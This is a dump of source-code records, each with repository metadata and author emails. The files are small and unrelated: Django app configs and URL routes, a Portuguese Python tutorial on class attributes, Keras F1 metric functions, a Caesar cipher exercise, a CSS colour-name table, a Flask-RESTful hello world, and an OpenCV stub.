"dataspace", name=name,
)
# Move single file back down to root (cookiecutter doesn't support)
os.rename(f"{name}/snapflow.yml", "snapflow.yml")
def handle_function(self, name: str, namespace: str):
module = self.import_current_snapflow_module()
namespace = getattr(module, "namespace", None)
with self.chdir_relative("functions"):
generate_template("function", function_name=name, namespace=namespace)
self.insert_function_into_current_init_file(name)
def handle_schema(self, name: str, namespace: str):
namespace = strip_snapflow(namespace or self.get_current_snapflow_module_name())
with self.chdir_relative("schemas"):
generate_template("schema", schema_name=name, namespace=namespace)
self.insert_schema_into_current_init_file(name)
def handle_flow(self, name: str, namespace: str):
namespace = strip_snapflow(namespace or self.get_current_snapflow_module_name())
os.chdir(self.abs_path("flows"))
generate_template("flow", flow_name=name, namespace=namespace)
|
[
"kenvanharen@gmail.com"
] |
kenvanharen@gmail.com
|
56c0e641146ff1f1664bf1b038aae0946cb7f434
|
6dc12a6426b18e1266639f023cc8d356055aed71
|
/Treadmillwebsite/apps.py
|
f2c9786e1c7982839f5423a66e2f67ec567feaf2
|
[] |
no_license
|
kiranM235/Treadmill-Website-Django
|
6d4e040bed03bfdca06e6fc4c0207dad92c071c2
|
35bb2eb6c19a0b5006f334a761ddfa7c14b4d345
|
refs/heads/master
| 2023-07-06T16:15:27.272961
| 2021-08-17T07:24:20
| 2021-08-17T07:24:20
| 395,590,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from django.apps import AppConfig
class TreadmillwebsiteConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'Treadmillwebsite'
|
[
"kiranmaharjan89@gmail.com"
] |
kiranmaharjan89@gmail.com
|
e43cfc6aa1633a9191785d3f556f8d0272598293
|
130d5455b1974710515ba4761d3b6780315725df
|
/core/orm/common.py
|
13e75a0a5dfe391691999bb199f9ad9f1d95f29c
|
[] |
no_license
|
Illicitus/aiohttp-playground
|
f3711af5aa3ddb5bad4f905b7045f4947684ae70
|
d0fdb54b4a35d5714e43f99c6ef1aee3bd37e107
|
refs/heads/main
| 2023-04-03T06:57:01.488181
| 2021-04-11T18:43:04
| 2021-04-11T18:43:04
| 349,416,149
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 79
|
py
|
from pydantic import ValidationError
from core.responses.json import NotFound
|
[
"honchar.vitalii@gmail.com"
] |
honchar.vitalii@gmail.com
|
377d8d2bcde9cc96994429bc34f03d2d7d68a11e
|
1d8ce00008e6f6cbb7f2728ea7e7b9af28b1a7c4
|
/guppe/POO/atributos.py
|
23709c67c5114837d0ea26e7fa497e4c92bae1d8
|
[] |
no_license
|
HigorSenna/python-study
|
05d09e09075dc2eb9c4f790928d68aab0c8a18b5
|
9b1a0c5e487b3cd397f371c7c4648148430e13d9
|
refs/heads/master
| 2022-12-03T00:16:53.075812
| 2020-08-17T15:54:01
| 2020-08-17T15:54:01
| 285,556,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,479
|
py
|
"""
Atributos
Em Python, por convenção, ficou estabelecido que todo atributo de uma classe deve ser PUBLICO, caso queira colocar
privado, é so usar __ em sua declaracao
"""
# Classe com atributos privados
class Lampada:
# OBS: Atributos privados: __nome
def __init__(self, voltagem, cor): # Construtor
self.__voltagem = voltagem
self.__cor = cor
self.__ligada = False
@property
def voltagem(self):
return self.__voltagem
@property
def cor(self):
return self.__cor
@property
def ligada(self):
return self.__ligada
class Acesso:
def __init__(self, email, senha):
self.email = email
self.__senha = senha
acesso = Acesso('email@gmail.com', '123456')
print(acesso.email)
# print(acesso.__senha) # AtributeError
# Name Mangling -> conseguimos acessar um atributo mesmo sendo privado (nao recomendado)
print(acesso._Acesso__senha)
# Classe com atributos publicos
class ContaCorrente:
def __init__(self, numero, limite, saldo):
self.numero = numero
self.limite = limite
self.saldo = saldo
# Em python, o primeiro atributo de um método é sempre a referencia do objeto, e como convenção sempre devemos chama-lo
# de self, porém podemos colocar qualquer nome:
class ContaPoupanca:
def __init__(this, numero, limite, saldo):
this.numero = numero
this.limite = limite
this.saldo = saldo
# ATRIBUTOS DE CLASSE (em Java: static)
from random import random
class Produto:
imposto = 1.05 # Atributo de instancia
def __init__(self, nome, valor):
self.id = random()
self.nome = nome
self.valor = (valor * Produto.imposto)
p1 = Produto('PS4', 2300)
print(p1.imposto) # Acesso possivel más incorreto para acesso ao atributo de classe, forma correta:
print(Produto.imposto)
p2 = Produto('PS5', 6000)
# Atributos Dinâmicos (Não comum)
# - É um atributo de instância que pode ser criado em tempo de execução e será exclusivo da instância que o criou
p3 = Produto('Xbox', 2300)
p3.peso = '5Kg' # Note que na classe produto nao existe o atributo peso
print(p3.peso)
# Listando os objetos com seus respectivos valores:
print(p3.__dict__) # Pega os atributos de INSTÂNCIA com seus valores e transforma e retorna um dicionario
# Deletando atributos
del p3.peso
print(p3.__dict__)
del p3.nome
print(p3.__dict__) # Posso deletar qualquer atributo de instância
|
[
"higorrebjfmg@gmail.com"
] |
higorrebjfmg@gmail.com
|
655594a78e371613ede21c222f5abad2afe4b62f
|
907efd02ac6920adac86571f46b89b05644b1e99
|
/apps/courseApp/urls.py
|
094d5c188c9aa63976caa218af96e83c4285d180
|
[] |
no_license
|
RyanGKist/DjangoCourses
|
3f2333fa26dfec5b6fc5492e04f098a26ac1b038
|
877d4f239b930f0089febaffdca870eee325178e
|
refs/heads/master
| 2021-08-14T15:13:42.822507
| 2017-11-16T02:58:13
| 2017-11-16T02:58:13
| 110,915,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$' , views.index),
url(r'^courseAdd$', views.course_create),
url(r'^remove(?P<uid>\d+)$', views.destroy),
url(r'^destroy(?P<uid>\d+)$', views.destroy_data)
]
|
[
"RyanGKistner@Patricks-MacBook-Pro-2.local"
] |
RyanGKistner@Patricks-MacBook-Pro-2.local
|
b8930744c4984b31348d1c800cd832c48d9884c9
|
9a42f514882b7c2ae8e444ef8aa7ff9ed0a33b22
|
/src/metrics.py
|
199d83ebc298db78f56e93abfccd5fa0fea390b3
|
[] |
no_license
|
gusriobr/crop_seq_prediction
|
aa2809d11d73a6c4d278245fd4f5f4444f23139b
|
01721b5ff826322723bc8b5ea0ef696b12dfdb07
|
refs/heads/master
| 2023-01-23T22:21:57.800323
| 2020-12-10T11:21:37
| 2020-12-10T11:21:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,047
|
py
|
import tensorflow as tf
import keras.backend as K
def f1(y_true, y_pred):
y_pred = K.round(y_pred)
tp = K.sum(K.cast(y_true * y_pred, 'float'), axis=0)
tn = K.sum(K.cast((1 - y_true) * (1 - y_pred), 'float'), axis=0)
fp = K.sum(K.cast((1 - y_true) * y_pred, 'float'), axis=0)
fn = K.sum(K.cast(y_true * (1 - y_pred), 'float'), axis=0)
p = tp / (tp + fp + K.epsilon())
r = tp / (tp + fn + K.epsilon())
f1 = 2 * p * r / (p + r + K.epsilon())
f1 = tf.where(tf.math.is_nan(f1), tf.zeros_like(f1), f1)
return K.mean(f1)
def f1_loss(y_true, y_pred):
tp = K.sum(K.cast(y_true * y_pred, 'float'), axis=0)
tn = K.sum(K.cast((1 - y_true) * (1 - y_pred), 'float'), axis=0)
fp = K.sum(K.cast((1 - y_true) * y_pred, 'float'), axis=0)
fn = K.sum(K.cast(y_true * (1 - y_pred), 'float'), axis=0)
p = tp / (tp + fp + K.epsilon())
r = tp / (tp + fn + K.epsilon())
f1 = 2 * p * r / (p + r + K.epsilon())
f1 = tf.where(tf.math.is_nan(f1), tf.zeros_like(f1), f1)
return 1 - K.mean(f1)
|
[
"gusriobr@gmail.com"
] |
gusriobr@gmail.com
|
b8a72b235685444f3296526d4ae00737b1cc4183
|
cba5017525d30f84f4555bc0e10f1f83126f1d4a
|
/Solar/solarInfo/apps.py
|
2fcdc3f23dfa80d2de63c42f6ff03df6ca0ff227
|
[
"Apache-2.0"
] |
permissive
|
cycmay/SolarS
|
66e97a0de6b459f8bb05b03c2690d9852d92209a
|
284bcafa5da210e5c4200d19e46b3fa6bb5acb20
|
refs/heads/master
| 2020-05-23T18:09:09.760666
| 2019-05-24T15:42:25
| 2019-05-24T15:42:25
| 186,882,616
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 94
|
py
|
from django.apps import AppConfig
class SolarConfig(AppConfig):
name = 'solarInfo'
|
[
"1769614470@qq.com"
] |
1769614470@qq.com
|
79ec10a6c2cd2eb5753da2872644f311bf6deecd
|
f752ca1367a85cf4413d1b0b9403976f2e67f7c7
|
/loo.py
|
7f506ae5dced5ff197167f82f637ce2d933bc0cf
|
[] |
no_license
|
raferalston/proverka
|
0cb3da2111fae2e6fc53da06aa7b9c74bb90b70d
|
b28afe8430fee02b3673dffa622cbd9977084fe5
|
refs/heads/main
| 2023-05-14T22:50:13.031900
| 2021-05-21T13:44:27
| 2021-05-21T13:44:27
| 369,549,662
| 0
| 0
| null | 2021-05-21T13:47:26
| 2021-05-21T13:47:26
| null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
i = int(input())
s = int(input())
y = int(input())
def loo(i, s ,y):
while y != 0:
s = i / 100 * s + s
y = y - 1
return s
print(loo(i, s, y))
|
[
"noreply@github.com"
] |
noreply@github.com
|
765bf9d191e29765530286712a31e9a39e6d6c5b
|
943d7ded0e464e3c3a4475c269eccde305865cf2
|
/natural_language_processing/Lemmatization.py
|
bfa9f27e3706ca4ce2e49bce557898592143df35
|
[] |
no_license
|
markikojr/DataScience
|
ab2d8af362012cf2985ce2c51d618605fd0f9223
|
40e1559ae511dfe8141bbfb17719aea099069b4a
|
refs/heads/master
| 2022-12-14T22:33:06.587191
| 2019-11-25T20:03:27
| 2019-11-25T20:03:27
| 200,712,164
| 1
| 0
| null | 2022-12-08T05:20:21
| 2019-08-05T18:56:22
|
Roff
|
UTF-8
|
Python
| false
| false
| 1,356
|
py
|
'''
This program shows some basics about Lemmatization using spacy library
'''
# Perform standard imports:
import spacy
nlp = spacy.load('en_core_web_sm')
print("---------- Create doc1 and apply tokenization, Part-or-speech tag and lemmatization:", "\n")
# Creating doc1
doc1 = nlp(u"I am a runner running in a race because I love to run since I ran today")
# Apply tokenization, Part-or-speech tag and lemmatization
for token in doc1:
print(token.text, '\t', token.pos_, '\t', token.lemma, '\t', token.lemma_)
print("---------- Define function to apply tokenization, Part-or-speech tag and lemmatization and better display:", "\n")
# Defining function to apply tokenization, Part-or-speech tag and lemmatization and better display
def show_lemmas(text):
for token in text:
print(f'{token.text:{12}} {token.pos_:{6}} {token.lemma:<{22}} {token.lemma_}')
print("---------- Create doc2 and apply function:", "\n")
# Create doc2 and apply function
doc2 = nlp(u"I saw eighteen mice today!")
show_lemmas(doc2)
print("---------- Create doc3 and apply function:", "\n")
# Create doc3 and apply function
doc3 = nlp(u"I am meeting him tomorrow at the meeting.")
show_lemmas(doc3)
print("---------- Create doc4 and apply function:", "\n")
# Create doc4 and apply function
doc4 = nlp(u"That's an enormous automobile")
show_lemmas(doc4)
|
[
"marcoscmartinsjr@gmail.com"
] |
marcoscmartinsjr@gmail.com
|
18dec9909a2f079119d67538333ae4ba3f2c8476
|
f3ccbc61c9a968e130536f66ec896393ea2ad463
|
/test/tp.py
|
bed900aab528b53223cc14f5438c94f8c3bb02bc
|
[] |
no_license
|
rutikatuscano22/Folder3
|
69f563cf1ec0fe71242bcaf99e7cefc44b70068d
|
59e5ba5e5c91221625567e629e4daf5601ab97ad
|
refs/heads/main
| 2023-04-16T08:26:36.762625
| 2021-04-28T15:49:41
| 2021-04-28T15:49:41
| 362,525,082
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14
|
py
|
print('sdf')
|
[
"noreply@github.com"
] |
noreply@github.com
|
b731f7bb0a905cd69ba11d5d934cc0ac33f22050
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/simple-cipher/7df478df5b6546c4b554e717f00f4c75.py
|
902cdef37788b91c86d3d3b606190688274c6913
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 1,338
|
py
|
'''cipher.py
created 6 Nov 2014
by @jestuber '''
import string
class Caesar(object):
"""docstring for Caesar"""
def __init__(self):
super(Caesar, self).__init__()
# self.arg = arg
def encode(self,plaintext):
return Cipher().encode(plaintext)
def decode(self,encoded):
return Cipher().decode(encoded)
class Cipher(object):
"""docstring for cipher"""
def __init__(self, key='d'):
super(Cipher, self).__init__()
self.key = key
self.shift = [string.lowercase.index(c) for c in key]
def encode(self,plaintext):
encoded = []
plaintext = plaintext.translate(None, string.punctuation+string.digits+' ').lower()
ishift = 0
for c in plaintext:
plainkey = string.lowercase.index(c)
newkey = plainkey + self.shift[ishift]
if newkey > 25:
newkey -= 26
encoded.append(string.lowercase[newkey])
ishift = 0 if ishift>=len(self.shift)-1 else ishift+1
return ''.join(encoded)
def decode(self,encoded):
plaintext = []
encoded = encoded.translate(None, string.punctuation+string.digits+' ').lower()
ishift = 0
for c in encoded:
enckey = string.lowercase.index(c)
newkey = enckey - self.shift[ishift]
if newkey < 0:
newkey += 26
plaintext.append(string.lowercase[newkey])
ishift = 0 if ishift>=len(self.shift)-1 else ishift+1
return ''.join(plaintext)
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
2e5db24847888b7364737d3edcf63f609a59d47b
|
65c001b5f572a6b0ca09dd9821016d628b745009
|
/frappe-bench/env/lib/python2.7/site-packages/cssutils/css/colors.py
|
0c4e4803b12d140e5337d66ce04c6406d01dfd2f
|
[
"MIT"
] |
permissive
|
ibrahmm22/library-management
|
666dffebdef1333db122c2a4a99286e7c174c518
|
b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506
|
refs/heads/master
| 2022-10-30T17:53:01.238240
| 2020-06-11T18:36:41
| 2020-06-11T18:36:41
| 271,620,992
| 0
| 1
|
MIT
| 2022-10-23T05:04:57
| 2020-06-11T18:36:21
|
CSS
|
UTF-8
|
Python
| false
| false
| 6,669
|
py
|
# -*- coding: utf-8 -*-
"""
Built from something like this:
print [
(
row[2].text_content().strip(),
eval(row[4].text_content().strip())
)
for row in lxml.html.parse('http://www.w3.org/TR/css3-color/')
.xpath("//*[@class='colortable']//tr[position()>1]")
]
by Simon Sapin
"""
COLORS = {
'transparent': (0, 0, 0, 0.0),
'black': (0, 0, 0, 1.0),
'silver': (192, 192, 192, 1.0),
'gray': (128, 128, 128, 1.0),
'white': (255, 255, 255, 1.0),
'maroon': (128, 0, 0, 1.0),
'red': (255, 0, 0, 1.0),
'purple': (128, 0, 128, 1.0),
'fuchsia': (255, 0, 255, 1.0),
'green': (0, 128, 0, 1.0),
'lime': (0, 255, 0, 1.0),
'olive': (128, 128, 0, 1.0),
'yellow': (255, 255, 0, 1.0),
'navy': (0, 0, 128, 1.0),
'blue': (0, 0, 255, 1.0),
'teal': (0, 128, 128, 1.0),
'aqua': (0, 255, 255, 1.0),
'aliceblue': (240, 248, 255, 1.0),
'antiquewhite': (250, 235, 215, 1.0),
'aqua': (0, 255, 255, 1.0),
'aquamarine': (127, 255, 212, 1.0),
'azure': (240, 255, 255, 1.0),
'beige': (245, 245, 220, 1.0),
'bisque': (255, 228, 196, 1.0),
'black': (0, 0, 0, 1.0),
'blanchedalmond': (255, 235, 205, 1.0),
'blue': (0, 0, 255, 1.0),
'blueviolet': (138, 43, 226, 1.0),
'brown': (165, 42, 42, 1.0),
'burlywood': (222, 184, 135, 1.0),
'cadetblue': (95, 158, 160, 1.0),
'chartreuse': (127, 255, 0, 1.0),
'chocolate': (210, 105, 30, 1.0),
'coral': (255, 127, 80, 1.0),
'cornflowerblue': (100, 149, 237, 1.0),
'cornsilk': (255, 248, 220, 1.0),
'crimson': (220, 20, 60, 1.0),
'cyan': (0, 255, 255, 1.0),
'darkblue': (0, 0, 139, 1.0),
'darkcyan': (0, 139, 139, 1.0),
'darkgoldenrod': (184, 134, 11, 1.0),
'darkgray': (169, 169, 169, 1.0),
'darkgreen': (0, 100, 0, 1.0),
'darkgrey': (169, 169, 169, 1.0),
'darkkhaki': (189, 183, 107, 1.0),
'darkmagenta': (139, 0, 139, 1.0),
'darkolivegreen': (85, 107, 47, 1.0),
'darkorange': (255, 140, 0, 1.0),
'darkorchid': (153, 50, 204, 1.0),
'darkred': (139, 0, 0, 1.0),
'darksalmon': (233, 150, 122, 1.0),
'darkseagreen': (143, 188, 143, 1.0),
'darkslateblue': (72, 61, 139, 1.0),
'darkslategray': (47, 79, 79, 1.0),
'darkslategrey': (47, 79, 79, 1.0),
'darkturquoise': (0, 206, 209, 1.0),
'darkviolet': (148, 0, 211, 1.0),
'deeppink': (255, 20, 147, 1.0),
'deepskyblue': (0, 191, 255, 1.0),
'dimgray': (105, 105, 105, 1.0),
'dimgrey': (105, 105, 105, 1.0),
'dodgerblue': (30, 144, 255, 1.0),
'firebrick': (178, 34, 34, 1.0),
'floralwhite': (255, 250, 240, 1.0),
'forestgreen': (34, 139, 34, 1.0),
'fuchsia': (255, 0, 255, 1.0),
'gainsboro': (220, 220, 220, 1.0),
'ghostwhite': (248, 248, 255, 1.0),
'gold': (255, 215, 0, 1.0),
'goldenrod': (218, 165, 32, 1.0),
'gray': (128, 128, 128, 1.0),
'green': (0, 128, 0, 1.0),
'greenyellow': (173, 255, 47, 1.0),
'grey': (128, 128, 128, 1.0),
'honeydew': (240, 255, 240, 1.0),
'hotpink': (255, 105, 180, 1.0),
'indianred': (205, 92, 92, 1.0),
'indigo': (75, 0, 130, 1.0),
'ivory': (255, 255, 240, 1.0),
'khaki': (240, 230, 140, 1.0),
'lavender': (230, 230, 250, 1.0),
'lavenderblush': (255, 240, 245, 1.0),
'lawngreen': (124, 252, 0, 1.0),
'lemonchiffon': (255, 250, 205, 1.0),
'lightblue': (173, 216, 230, 1.0),
'lightcoral': (240, 128, 128, 1.0),
'lightcyan': (224, 255, 255, 1.0),
'lightgoldenrodyellow': (250, 250, 210, 1.0),
'lightgray': (211, 211, 211, 1.0),
'lightgreen': (144, 238, 144, 1.0),
'lightgrey': (211, 211, 211, 1.0),
'lightpink': (255, 182, 193, 1.0),
'lightsalmon': (255, 160, 122, 1.0),
'lightseagreen': (32, 178, 170, 1.0),
'lightskyblue': (135, 206, 250, 1.0),
'lightslategray': (119, 136, 153, 1.0),
'lightslategrey': (119, 136, 153, 1.0),
'lightsteelblue': (176, 196, 222, 1.0),
'lightyellow': (255, 255, 224, 1.0),
'lime': (0, 255, 0, 1.0),
'limegreen': (50, 205, 50, 1.0),
'linen': (250, 240, 230, 1.0),
'magenta': (255, 0, 255, 1.0),
'maroon': (128, 0, 0, 1.0),
'mediumaquamarine': (102, 205, 170, 1.0),
'mediumblue': (0, 0, 205, 1.0),
'mediumorchid': (186, 85, 211, 1.0),
'mediumpurple': (147, 112, 219, 1.0),
'mediumseagreen': (60, 179, 113, 1.0),
'mediumslateblue': (123, 104, 238, 1.0),
'mediumspringgreen': (0, 250, 154, 1.0),
'mediumturquoise': (72, 209, 204, 1.0),
'mediumvioletred': (199, 21, 133, 1.0),
'midnightblue': (25, 25, 112, 1.0),
'mintcream': (245, 255, 250, 1.0),
'mistyrose': (255, 228, 225, 1.0),
'moccasin': (255, 228, 181, 1.0),
'navajowhite': (255, 222, 173, 1.0),
'navy': (0, 0, 128, 1.0),
'oldlace': (253, 245, 230, 1.0),
'olive': (128, 128, 0, 1.0),
'olivedrab': (107, 142, 35, 1.0),
'orange': (255, 165, 0, 1.0),
'orangered': (255, 69, 0, 1.0),
'orchid': (218, 112, 214, 1.0),
'palegoldenrod': (238, 232, 170, 1.0),
'palegreen': (152, 251, 152, 1.0),
'paleturquoise': (175, 238, 238, 1.0),
'palevioletred': (219, 112, 147, 1.0),
'papayawhip': (255, 239, 213, 1.0),
'peachpuff': (255, 218, 185, 1.0),
'peru': (205, 133, 63, 1.0),
'pink': (255, 192, 203, 1.0),
'plum': (221, 160, 221, 1.0),
'powderblue': (176, 224, 230, 1.0),
'purple': (128, 0, 128, 1.0),
'red': (255, 0, 0, 1.0),
'rosybrown': (188, 143, 143, 1.0),
'royalblue': (65, 105, 225, 1.0),
'saddlebrown': (139, 69, 19, 1.0),
'salmon': (250, 128, 114, 1.0),
'sandybrown': (244, 164, 96, 1.0),
'seagreen': (46, 139, 87, 1.0),
'seashell': (255, 245, 238, 1.0),
'sienna': (160, 82, 45, 1.0),
'silver': (192, 192, 192, 1.0),
'skyblue': (135, 206, 235, 1.0),
'slateblue': (106, 90, 205, 1.0),
'slategray': (112, 128, 144, 1.0),
'slategrey': (112, 128, 144, 1.0),
'snow': (255, 250, 250, 1.0),
'springgreen': (0, 255, 127, 1.0),
'steelblue': (70, 130, 180, 1.0),
'tan': (210, 180, 140, 1.0),
'teal': (0, 128, 128, 1.0),
'thistle': (216, 191, 216, 1.0),
'tomato': (255, 99, 71, 1.0),
'turquoise': (64, 224, 208, 1.0),
'violet': (238, 130, 238, 1.0),
'wheat': (245, 222, 179, 1.0),
'white': (255, 255, 255, 1.0),
'whitesmoke': (245, 245, 245, 1.0),
'yellow': (255, 255, 0, 1.0),
'yellowgreen': (154, 205, 50, 1.0),
}
|
[
"iabouelftouh@trudoc24x7.com"
] |
iabouelftouh@trudoc24x7.com
|
30a67ecaa65f58462ea307f9e7814f41c0df1c1a
|
2aace9bb170363e181eb7520e93def25f38dbe5c
|
/build/idea-sandbox/system/python_stubs/cache/2e033ce6e3a2cdde5174895cadb3b406b2a013729dd641fee2cebd9f7ed97879/cv2/cv2/StereoMatcher.py
|
7ab88dbc440f1ef092cd9bd0c28536beb666920f
|
[] |
no_license
|
qkpqkp/PlagCheck
|
13cb66fd2b2caa2451690bb72a2634bdaa07f1e6
|
d229904674a5a6e46738179c7494488ca930045e
|
refs/heads/master
| 2023-05-28T15:06:08.723143
| 2021-06-09T05:36:34
| 2021-06-09T05:36:34
| 375,235,940
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,845
|
py
|
# encoding: utf-8
# module cv2.cv2
# from C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
# by generator 1.147
""" Python wrapper for OpenCV. """
# imports
import cv2.cv2 as # C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
import cv2.Error as Error # <module 'cv2.Error'>
import cv2.aruco as aruco # <module 'cv2.aruco'>
import cv2.bgsegm as bgsegm # <module 'cv2.bgsegm'>
import cv2.bioinspired as bioinspired # <module 'cv2.bioinspired'>
import cv2.cuda as cuda # <module 'cv2.cuda'>
import cv2.datasets as datasets # <module 'cv2.datasets'>
import cv2.detail as detail # <module 'cv2.detail'>
import cv2.dnn as dnn # <module 'cv2.dnn'>
import cv2.face as face # <module 'cv2.face'>
import cv2.fisheye as fisheye # <module 'cv2.fisheye'>
import cv2.flann as flann # <module 'cv2.flann'>
import cv2.ft as ft # <module 'cv2.ft'>
import cv2.hfs as hfs # <module 'cv2.hfs'>
import cv2.img_hash as img_hash # <module 'cv2.img_hash'>
import cv2.instr as instr # <module 'cv2.instr'>
import cv2.ipp as ipp # <module 'cv2.ipp'>
import cv2.kinfu as kinfu # <module 'cv2.kinfu'>
import cv2.line_descriptor as line_descriptor # <module 'cv2.line_descriptor'>
import cv2.linemod as linemod # <module 'cv2.linemod'>
import cv2.ml as ml # <module 'cv2.ml'>
import cv2.motempl as motempl # <module 'cv2.motempl'>
import cv2.multicalib as multicalib # <module 'cv2.multicalib'>
import cv2.ocl as ocl # <module 'cv2.ocl'>
import cv2.ogl as ogl # <module 'cv2.ogl'>
import cv2.omnidir as omnidir # <module 'cv2.omnidir'>
import cv2.optflow as optflow # <module 'cv2.optflow'>
import cv2.plot as plot # <module 'cv2.plot'>
import cv2.ppf_match_3d as ppf_match_3d # <module 'cv2.ppf_match_3d'>
import cv2.quality as quality # <module 'cv2.quality'>
import cv2.reg as reg # <module 'cv2.reg'>
import cv2.rgbd as rgbd # <module 'cv2.rgbd'>
import cv2.saliency as saliency # <module 'cv2.saliency'>
import cv2.samples as samples # <module 'cv2.samples'>
import cv2.structured_light as structured_light # <module 'cv2.structured_light'>
import cv2.text as text # <module 'cv2.text'>
import cv2.utils as utils # <module 'cv2.utils'>
import cv2.videoio_registry as videoio_registry # <module 'cv2.videoio_registry'>
import cv2.videostab as videostab # <module 'cv2.videostab'>
import cv2.xfeatures2d as xfeatures2d # <module 'cv2.xfeatures2d'>
import cv2.ximgproc as ximgproc # <module 'cv2.ximgproc'>
import cv2.xphoto as xphoto # <module 'cv2.xphoto'>
import cv2 as __cv2
class StereoMatcher(__cv2.Algorithm):
# no doc
def compute(self, left, right, disparity=None): # real signature unknown; restored from __doc__
"""
compute(left, right[, disparity]) -> disparity
. @brief Computes disparity map for the specified stereo pair
.
. @param left Left 8-bit single-channel image.
. @param right Right image of the same size and the same type as the left one.
. @param disparity Output disparity map. It has the same size as the input images. Some algorithms,
. like StereoBM or StereoSGBM compute 16-bit fixed-point disparity map (where each disparity value
. has 4 fractional bits), whereas other algorithms output 32-bit floating-point disparity map.
"""
pass
def getBlockSize(self): # real signature unknown; restored from __doc__
"""
getBlockSize() -> retval
.
"""
pass
def getDisp12MaxDiff(self): # real signature unknown; restored from __doc__
"""
getDisp12MaxDiff() -> retval
.
"""
pass
def getMinDisparity(self): # real signature unknown; restored from __doc__
"""
getMinDisparity() -> retval
.
"""
pass
def getNumDisparities(self): # real signature unknown; restored from __doc__
"""
getNumDisparities() -> retval
.
"""
pass
def getSpeckleRange(self): # real signature unknown; restored from __doc__
"""
getSpeckleRange() -> retval
.
"""
pass
def getSpeckleWindowSize(self): # real signature unknown; restored from __doc__
"""
getSpeckleWindowSize() -> retval
.
"""
pass
def setBlockSize(self, blockSize): # real signature unknown; restored from __doc__
"""
setBlockSize(blockSize) -> None
.
"""
pass
def setDisp12MaxDiff(self, disp12MaxDiff): # real signature unknown; restored from __doc__
"""
setDisp12MaxDiff(disp12MaxDiff) -> None
.
"""
pass
def setMinDisparity(self, minDisparity): # real signature unknown; restored from __doc__
"""
setMinDisparity(minDisparity) -> None
.
"""
pass
def setNumDisparities(self, numDisparities): # real signature unknown; restored from __doc__
"""
setNumDisparities(numDisparities) -> None
.
"""
pass
def setSpeckleRange(self, speckleRange): # real signature unknown; restored from __doc__
"""
setSpeckleRange(speckleRange) -> None
.
"""
pass
def setSpeckleWindowSize(self, speckleWindowSize): # real signature unknown; restored from __doc__
"""
setSpeckleWindowSize(speckleWindowSize) -> None
.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
|
[
"qinkunpeng2015@163.com"
] |
qinkunpeng2015@163.com
|
bd60096a6677e31ccf2f53c0600f73f693a5370f
|
12c43be8658110886f71bd792653c7f2c7d9b016
|
/project/app/apps.py
|
d85135acda52ac4478cffadffcfcb0eeb6b61525
|
[] |
no_license
|
umum253/django-generic-project
|
8caf11e19d31766be0e651d979341591020f763c
|
60042cf8fea5a0b8ca3defe18fb96e0b5044e6fe
|
refs/heads/main
| 2023-06-29T23:49:27.318825
| 2021-08-06T10:53:03
| 2021-08-06T10:53:03
| 393,347,584
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from django.apps import AppConfig
class SampleAppConfig(AppConfig):
name = 'app'
verbose_name = 'アプリ'
|
[
"fkwpostpost@gmail.com"
] |
fkwpostpost@gmail.com
|
93b50fe7cb62642f0337d0ffed643cb754d339e0
|
db1d9b55ac8e15182336d8fdbfcd5668d908fba6
|
/4_flask_restful_hello_world.py
|
db6e1ce37da625792a32e450fad8340a9a7356f2
|
[] |
no_license
|
sangameshBB/apis_with_flask
|
573694ac00bc9ddf443df977a119d678edc6e67f
|
81c088a048f1445b05ef151a74283778db1ad13d
|
refs/heads/master
| 2022-09-05T23:01:35.623221
| 2020-05-29T14:39:59
| 2020-05-29T14:39:59
| 267,879,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 289
|
py
|
from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class HelloWorld(Resource):
def get(self):
return {'hello': 'world'}
api.add_resource(HelloWorld, '/')
if __name__ == '__main__':
app.run(debug=True)
|
[
"noreply@github.com"
] |
noreply@github.com
|
22ace41fc6d9774b05648c5ecdfc968f4e0cff95
|
c3fd71a80fadbf2b567911b2fd3aa2e16f6e5a39
|
/jpl/cli/config.py
|
416b87bb9928be54d40bddbd87ae709928795d04
|
[
"MIT"
] |
permissive
|
thejig/jpl
|
ae88037e82d414eb096282421d9b5e5231072ae7
|
be58184e29588f01e494f218354791516d481f3b
|
refs/heads/master
| 2021-01-05T06:23:48.639782
| 2020-06-12T02:18:17
| 2020-06-12T02:18:17
| 240,913,777
| 0
| 1
|
MIT
| 2020-02-28T01:08:52
| 2020-02-16T15:19:46
|
Python
|
UTF-8
|
Python
| false
| false
| 170
|
py
|
"""Configuration for CLI."""
################
# CLICK COLORS #
################
MARK_TO_COLOR = {
"PASSED": "green",
"WARNING": "yellow",
"FAILED": "red"
}
|
[
"leonkozlowski@gmail.com"
] |
